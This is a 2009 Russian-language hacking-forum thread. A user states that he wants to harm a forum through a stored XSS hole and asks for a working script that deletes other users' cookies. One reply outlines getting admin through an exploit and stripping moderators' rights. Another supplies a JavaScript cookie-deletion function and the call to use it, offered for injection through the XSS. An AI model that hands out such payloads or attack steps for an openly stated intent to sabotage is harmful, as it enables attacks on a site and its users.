Как удалять куки с помощью xss активки?

Discussion in 'Песочница' started by xMSAx, 6 Apr 2009.

  1. xMSAx

    xMSAx New Member

    Joined:
    1 Mar 2009
    Messages:
    15
    Likes Received:
    0
    Reputations:
    -1
    Хочу навредить форуму . Чтобы оставить алерт и парализовать систему. и чтобы мое сообщения не могли удалить! Ну куков нету и какбы не авторизованный :) Подскажите РЕАЛЬНО работающий скрипт.
     
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    А не слишком большие запросы? =///
    Качай сплойт под свой форум, получай админа, прописывай в коде свой яваскрипт алерт...чтоб никто не удалил твои посты - сними права у всех админов и модеров...парализовать систему...эм...что ты имел ввиду???


    Эм...скрипт, который выполнит все твои прихоти - НЕТУ!!!
    А если ты про сплойт, то для начала скажи название и версию форума...

    А на щёт куков, то так же поднимай багтраки в поисках XSS на свой форум...
     
    #2 -m0rgan-, 6 Apr 2009
    Last edited: 6 Apr 2009
  3. xMSAx

    xMSAx New Member

    Joined:
    1 Mar 2009
    Messages:
    15
    Likes Received:
    0
    Reputations:
    -1
    ЫЫ .. Ты меня не понял . У меня есть активная xss , я хочу оставить скрипт который будет удалять куки у юзеров.
     
  4. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    Code:
    function Delete_Cookie( name, path, domain ) {
    if ( Get_Cookie( name ) ) document.cookie = name + "=" +
    ( ( path ) ? ";path=" + path : "") +
    ( ( domain ) ? ";domain=" + domain : "" ) +
    ";expires=Mon, 01-Jan-1990 00:00:01 GMT";
    }
    вызывается так:
    Delete_Cookie('точное название Cookie', 'путь указаный в Cookie', 'домейн указаный в Cookie');
     
Loading...